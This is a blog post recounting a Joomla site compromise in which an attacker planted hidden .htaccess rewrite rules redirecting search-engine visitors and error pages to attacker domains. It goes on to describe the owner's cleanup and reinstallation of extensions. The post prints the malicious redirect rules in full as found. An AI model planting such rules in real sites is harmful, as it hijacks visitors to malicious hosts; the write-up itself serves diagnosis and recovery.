htaccess Redirect Attack

Rinet IT had a problem where some images weren't being loaded for the drop down boxes on the front page. Using Firebug, an addon for Firefox (my favourite browser), the image link was OK but the image wasn't being displayed in a small box in Firebug like it normally does; very puzzling.

Next I used the Net option of Firebug to check the loading of the faulty images. Instead of getting "200 OK" I got a "301 Moved Permanently" error.

After some quick research on Google I discovered htaccess hacks. I had a look at my htaccess. At first it appeared OK, but there was lots of empty lines at the start. Scrolling over to the right revealed the malicious code as can be seen below.

The result is that the .htaccess file has been modified with:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|alaarchiv|infospace).(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-land|browseireland|finditireland|iesearch|ireland-ikz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]


... and after the legitimate code was ...

ErrorDocument 500 http://gdrivedownuntil. pro/creation?8

File Permissions and Destinations.

In addition the hackers set the htaccess permissions to 0444 removing the write priviledge for the file owner; just a small frustration. These guys are really annoying.

The destination sites were all dead but registered with legitimate looking owners as checked with the whois command.

The destinations changed everytime and included:

  • tinkerbellcc.pro
  • complexcombining.net
  • etc!

The Fix

First I tried finding the faulty file, spending hours on it; but it was a waste of time.

A restore from an Akeebra backup didn't help either; the rogue file must have been backed up along with everything else.

In the end I followed the advice from the Joomla Security Page 7.

  1. Save the configuration.php file and your images and personal files one by one, (not the folder as it may contain unwanted files)
  2. Wipe the entire folder where Joomla! is installed. This is best done using your host's file manager or an SSH Shell session.
  3. Upload a new clean full package latest version of joomla 1.5.x or Joomla .5.x (minus the install folder).
    You can do this by uploading then extracting the zip file and then deleting the installation folder
  4. Reupload your configuration file & images, having a look at each file using a binary viewer (Notepad++ works well here) checking for malicious code etc.
  5. Reinstall the latest versions of your extensions , templates (even better is to use original clean copies to ensure that the hacker/defacer did not leave any shell script files in your site). Once again check each file for malicious code.

The database is left intact, however some extensions reinstalled better than others.

Extension Recovery

Extension/Plugin Uninstall
Akeebra Backup No Reinstalling over an existing one should be OK. I removed it first and the new installation does not see the older backups. They still exist in the folder.
CK Forms No Removing this deleted the database tables for ckforms. Redoing the form is quite a pain.It would be worthwhile leaving it and try reinstalling over the top of the existing installation.For my recovery I had to copy the data from the /installation/sql SQL files to the new database using phpMyAdmin.
JCE Yes As for CK forms, although redoing the setup does not take long.
jQuery++ (from tusher.org) Yes Reinstall fresh. The codes in the articles are not removed on uninstall.
FAQ Slider (0.9RC5.1) Yes Reinstall fresh. The codes in the articles were not affected.
Thickbox+ v1.3.1 Yes Reinstall fresh. The codes in the articles were not affected.
JCrawler Yes Not reinstalled yet.

One comment on “htaccess Redirect Attack”

Leave a Reply

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram